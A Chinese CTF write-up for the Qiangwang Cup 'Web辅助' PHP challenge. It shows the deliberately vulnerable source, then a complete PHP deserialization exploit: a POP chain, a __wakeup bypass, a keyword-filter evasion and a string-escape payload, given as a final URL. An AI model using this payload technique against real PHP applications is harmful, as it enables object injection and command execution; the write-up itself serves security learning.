php能做辅助吗,浅谈强网杯Web辅助

于 2021-03-19 14:53:47 发布
阅读量126 收藏
点赞数
文章标签: php能做辅助吗

原标题:浅谈强网杯Web辅助

1、写在前面

这里就借由强网杯的一道题目“Web辅助”,来讲讲从构造POP链,字符串逃逸到最后获取flag的过程

2、题目源码

index.php

获取我们传入的username和password,并将其序列化储存

if (isset($_GET['username']) && isset($_GET['password'])){

$username = $_GET['username'];

$password = $_GET['password'];

$player = new player($username, $password);

file_put_contents("caches/".md5($_SERVER['REMOTE_ADDR']), write(serialize($player)));

echo sprintf('Welcome %s, your ip is %s\n', $username, $_SERVER['REMOTE_ADDR']);

}

else{

echo "Please input the username or password!\n";

}

common.php

这里面的read,write有与'\0\0', chr(0)."".chr(0)相关的替换操作,还有一个check对我们的序列化的内容进行检查,判断是否存在关键字name,这里也是我们需要绕过的一个地方

function read($data){

$data = str_replace('\0*\0', chr(0)."*".chr(0), $data);

var_dump($data);

return $data;

}

function write($data){

$data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);

return $data;

}

function check($data)

{

if(stristr($data, 'name')!==False){

die("Name Pass\n");

}

else{

return $data;

}

}

?>

play.php

在写入序列化的内容之后,访问play.php,如果我们的操作通过了check,然后经过了read的替换操作之后,便会进行反序列化操作

@$player = unserialize(read(check(file_get_contents("caches/".md5($_SERVER['REMOTE_ADDR'])))));

class.php

这里存在着各种类,也是我们构造pop链的关键,我们的目的是为了触发最后的cat /flag

class player{

protected $user;

protected $pass;

protected $admin;

public function __construct($user, $pass, $admin = 0){

$this->user = $user;

$this->pass = $pass;

$this->admin = $admin;

}

public function get_admin(){

$this->admin = 1;

return $this->admin ;

}

}

class topsolo{

protected $name;

public function __construct($name = 'Riven'){

$this->name = $name;

}

public function TP(){

if (gettype($this->name) === "function" or gettype($this->name) === "object"){

$name = $this->name;

$name();

}

}

public function __destruct(){

$this->TP();

}

}

class midsolo{

protected $name;

public function __construct($name){

$this->name = $name;

}

public function __wakeup(){

if ($this->name !== 'Yasuo'){

$this->name = 'Yasuo';

echo "No Yasuo! No Soul!\n";

}

}

public function __invoke(){

$this->Gank();

}

public function Gank(){

if (stristr($this->name, 'Yasuo')){

echo "Are you orphan?\n";

}

else{

echo "Must Be Yasuo!\n";

}

}

}

class jungle{

protected $name = "";

public function __construct($name = "Lee Sin"){

$this->name = $name;

}

public function KS(){

system("cat /flag");

}

public function __toString(){

$this->KS();

return "";

}

}

?>

3、涉及考点

POP链的构造

__wakeup的绕过

关键字“name”检测绕过

反序列化字符串逃逸

4、题目出现的魔术方法

__construct:构造函数,具有构造函数的类会在每次创建新对象时先调用此方法

__destruct: 析构函数,析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行

wakeup:unserialize()会检查是否存在一个wakeup() 方法。如果存在,则会先调用

invoke:当尝试以调用函数的方式调用一个对象时,invoke() 方法会被自动调用

__toString():用于一个类被当成字符串时应怎样回应

5、POP链

POP链:如果我们需要触发的关键代码在一个类的普通方法中,例如本题的system('cat /flag')在jungle类中的KS方法中,这个时候我们可以通过相同的函数名将类的属性和敏感函数的属性联系起来

6、POP链的构造

这里涉及到三个类,topsolo、midsolo、jungle,其中观察到topsolo类中的TP方法中,使用了$name(),如果我们将一个对象赋值给$name,这里便是以调用函数的方式调用了一个对象,此时会触发invoke方法,而invoke方法存在与midsolo中,invoke()会触发Gank方法,执行了stristr操作。

我们的最终目的是要触发jungle类中的KS方法,从而cat /flag,而触发KS方法得先触发__toString方法,一般来说,在我们使用echo输出对象时便会触发,例如:

class test{

function __toString(){

echo "__toString()";

return "";

}

}

$a = new test();

echo $a;

//输出:__toString()

在common.php中,我们并没有看到有echo一个类的操作,但是有一个stristr($this->name, 'Yasuo')的操作,我们来看一下:

class test{

function __toString(){

echo "__toString()";

return "";

}

}

$a = new test();

stristr($a,'name');

//输出__toString()

所以整个POP链已经构成了

topsolo->__destruct()->TP()->$name()->midsolo->__invoke()->Gank()->stristr()->jungle->__toString()->KS()->syttem('cat /flag')

class topsolo{

protected $name;

public function __construct($name = 'Riven'){

$this->name = $name;

}

}

class midsolo{

protected $name;

public function __construct($name){

$this->name = $name;

}

}

class jungle{

protected $name = "";

}

$a = new topsolo(new midsolo(new jungle()));

$exp = serialize($a);

var_dump(urlencode($exp));

?>

输出:

O%3A7%3A%22topsolo%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00name%22%3BO%3A7%3A%22midsolo%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00name%22%3BO%3A6%3A%22jungle%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D

在midsolo中wakeup需要绕过,老套路了,序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行,这里我将1改为2

O%3A7%3A%22topsolo%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00name%22%3BO%3A7%3A%22midsolo%22%3A2%3A%7Bs%3A7%3A%22%00%2A%00name%22%3BO%3A6%3A%22jungle%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00name%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D

O:7:"topsolo":1:{s:7:"\000*\000name";O:7:"midsolo":2:{s:7:"\000*\000name";O:6:"jungle":1:{s:7:"\000*\000name";s:0:"";}}}

7、关键字“name”检测绕过

···

function check($data)

{

if(stristr($data, 'name')!==False){

die("Name Pass\n");

}

else{

return $data;

}

}

···

这里使用十六进制绕过\6e\61\6d\65,并将s改为S

O%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A7%3A%22midsolo%22%3A2%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D

8、字符串逃逸

访问index.php,传入数值,得到序列化内容

O:6:"player":3:{s:7:"\0*\0user";s:0:"";s:7:"\0*\0pass";s:126:"O:7:"topsolo":1:{S:7:"\0*\0\6e\61\6d\65";O:7:"midsolo":2:{S:7:"\0*\0\6e\61\6d\65";O:6:"jungle":1:{S:7:"\0*\0\6e\61\6d\65";s:0:"";}}}";s:8:"\0*\0admin";i:0;}

可以看到对象topsolo,midsolo被s:102,所包裹,我们要做的就是题目环境本身的替换字符操作从而达到对象topsolo,midsolo从引号的包裹中逃逸出来

···

function read($data){

$data = str_replace('\0*\0', chr(0)."*".chr(0), $data);

var_dump($data);

return $data;

}

function write($data){

$data = str_replace(chr(0)."*".chr(0), '\0*\0', $data);

return $data;

}

···

在反序列化操作前,有个read的替换操作,字符数量从5位变成3位,合理构造username的长度,经过了read的替换操作后,最后将";s:7:"\0\0pass";s:126吃掉,需要吃掉的长度为23,因为5->3,所以得为2的倍数,需要在password中再填充一个字符C,变成24位,所以我们一共需要构造12个\0\0来进行username填充,得到username

username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0

在password中补上被吃掉的pass部分,构造password的提交内容

password=C";s:7:"\0*\0pass";O%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A7%3A%22midsolo%22%3A2%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D

最后提交

?username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=C";s:7:"\0*\0pass";O%3A7%3A%22topsolo%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A7%3A%22midsolo%22%3A2%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3BO%3A6%3A%22jungle%22%3A1%3A%7BS%3A7%3A%22%00%2A%00\6e\61\6d\65%22%3Bs%3A0%3A%22%22%3B%7D%7D%7D

然后访问play.php即可得到flag返回搜狐,查看更多

责任编辑:

weixin_39630771
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现的某SNS手机游戏的简单外挂
书中蠹dù鱼 {bookmoth} 的专栏
11-04 5582
 首先简单介绍一下这个游戏,手机游戏大航海是人人网上一个纯手机游戏,目前只针对手机校内用户。 手机访问m.xiaonei.com->应用->大航海来体验这个手机游戏的乐趣。现在随着SNS的流行,WEB游戏也开始流行。有时候并不是为了玩游戏,更多的时候是遍历一遍好友。回到外挂这个话题上来。作为手机游戏,受到手机浏览器的限制,这个WAP游戏不可能的很炫很复杂。所以弄个外挂还是非常简单的。
强网杯SQL题目复现php.zip
最新发布
12-17
【标题】"强网杯SQL题目复现php.zip"是一个针对网络安全竞赛——强网杯的解题资源包,其中包含了与SQL(结构化查询语言)相关的挑战。这个压缩包特别关注了如何在PHP环境中重现这些SQL题目。 【描述】描述中的...
长沙php课程哪个好,长沙php周末培训班
weixin_34688784的博客
03-09 163
1) FORPforp是提供PHP配置文件数据的轻量级PHP扩展。2) HOAHoa 是另一个非常流行的PHP库。3) PHP CPPPHP-CPP库是一个用于开发PHP扩展的C++库。它提供了一个可以用了创建PHP扩展的、文档健全、简单易用的类的集合。4) SlimStarterSlimStarter为中小型Web应用提供了完美解决方案,提供HMVC环境,只有4M左右的大小。建立在完善的Slim...
php 挂机,PHP实现挂QQ,QQ挂机php代码
weixin_34149824的博客
03-10 441
PHP实现的在线挂机QQ代码,注意,示例告诉了你思路和方法,里面的挂机地址要看腾讯是否改变了,若要是改变了,就要自己去考证下,替换成正确的挂机页地址,代码只是一种思路的展现。...
php能写游戏脚本吗,php可以游戏脚本吗
weixin_39692253的博客
03-09 315
php可以游戏脚本吗?php完全可以游戏脚本。如:简单的掷骰器许多游戏和游戏系统都需要骰子。让我们先从简单的部分入手:掷一个六面骰子。实际上,滚动一个六面骰子就是从 1 到 6 之间选择一个随机数字。在 PHP 中,这十分简单:echo rand(1,6);。在许多情况下,这基本上很简单。但是在处理机率游戏时,我们需要一些更好的实现。PHP 提供了更好的随机数字生成器:mt_rand()。在不...
浅谈PHP安全防护之Web攻击
10-20
常见的Web攻击分为两类:一是利用Web服务器的漏洞进行攻击,如CGI缓冲区溢出,目录遍历漏洞利用等攻击;二是利用网页自身的安全漏洞进行攻击,如SQL注入,跨站脚本攻击等。下面这篇文章主要介绍了PHP安全防护之Web...
游戏辅助售官网源码PHP带后台源码资源下载整理.zip
08-21
游戏辅助售官网源码是构建在线游戏辅助销售平台的核心组件,通常由PHP语言编写,因为PHPWeb开发领域具有广泛的应用和支持。这个源码资源包括了后台管理系统,使得管理员能够有效地管理和控制整个平台的运营。下面...
当了一回网管,见识了一下php的挂码方法
linux内核探索
10-18 4111
当了一回网管好长时间都没有更新博客了。这回也来写一把非研发的东西。问题起因是有一台有固定IP地址的web服务器,然后装的是windows版的。服务器上跑的是一个php的动态站点。后台用的是dedecms为建站系统。但是最近以来。这个站点一直被挂马。倒底是windows服务器被攻破,还是网站被人上传了恶意的木马?不得而知。每回把服务器重新恢复,没过一段时间,又会被挂马,在首页最下端出现了“百度联盟”
php开源hr,10款实用的PHP开源工具
weixin_34161139的博客
03-09 248
10款实用的PHP开源工具在开发工作中,使用合适的工具可以最大化地提高效率。此外,大量的开源项目也节省了开发者重复“造轮”的时间,使得开发者可以专注于业务的实现。欢迎大家阅读!更多相关信息请关注相关栏目!1. DebugbarDebugBar是一个免费和开源的应用,能够集成至任何PHP项目中,并收集和展示分析数据。它有没有任何依赖,支持Ajax请求,包括常用开发库的通用数据采集器和收集器。2. M...
自己写了一个开心网安抚奴隶的小外挂,晒晒php源码。
仲伟涛学习笔记
02-04 3705
开心网(kaixin001的那个)我每天必上,9个奴隶从头到尾安抚一次,感觉很费劲,早上上班来无聊就写了一个安抚的小程序,放上来。 功能比较简单,只完成了安抚操作,其他操作原理一样,工作比较忙就没时间弄了.... 我用的是 curl_http_client.php  (curl的包装类)下载地址:http://www.phpclasses.org/browse/file/15747.h
php 挂机,用php实现qq挂机
weixin_39612726的博客
03-10 124
php实现qq挂机互联网 发布时间:2009-04-27 02:05:20 作者:佚名 我要评论时QQ挂机十分流行,最近看到某位高人写了这样一段PHP代码实现QQ挂机,特拿出来与各位分享一下。PHP代码:$qq = "100000"; //qq号码$pwd = "123456"; //密码$ch = curl_ini时QQ挂机十分流行,最近看到某位高人写了这样一段PHP代码实现QQ...
利用phpize 外挂php扩展
weixin_30621711的博客
06-05 114
如果你的php是手动编译安装的 ,可能有一些扩展一开始并没有开启,以后需要某扩展的时候又不想重新编译php,使用phpize可以动态添加扩展以Ubuntu为例,如果你是我这样安装php的 apt-get install php7.0此时你会发现系统中找不到phpizeapt-get install php7.0-dev 现在有了比如我现在要安装 xdebug模块首先到xdebug官网下载对应版本...
【外挂编程】外挂编程技术揭秘(一)
热门推荐
c-rain
01-08 1万+
引言: 本人并不是这方面专业的人员,我是一名PHP工程师。写这个主题,源自于我的“初心”。在最初我没有接触技术的时候,那会我是个网虫,刚开始也学习一些黑客相关的知识,当用到一些工具时,就很好奇这些东西是怎么的。我就特别想去写一些相关工具和外挂以及一些小病毒。在一次与一名老师的偶遇中,我进入了技术领域。但是最初学习的是Java的web方向,后来由于工作原因转的PHP...
2018强网杯CTF Web挑战解析:绕过与解密
"这篇文档是关于2018年第二届强网杯线上赛CTF(Capture The Flag)的Web挑战的解题总结,主要涉及网络安全和Web安全领域,适合CTF爱好者和网络安全学习者参考。文章包含了不同层次的题目解析,特别是其中的Web签到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值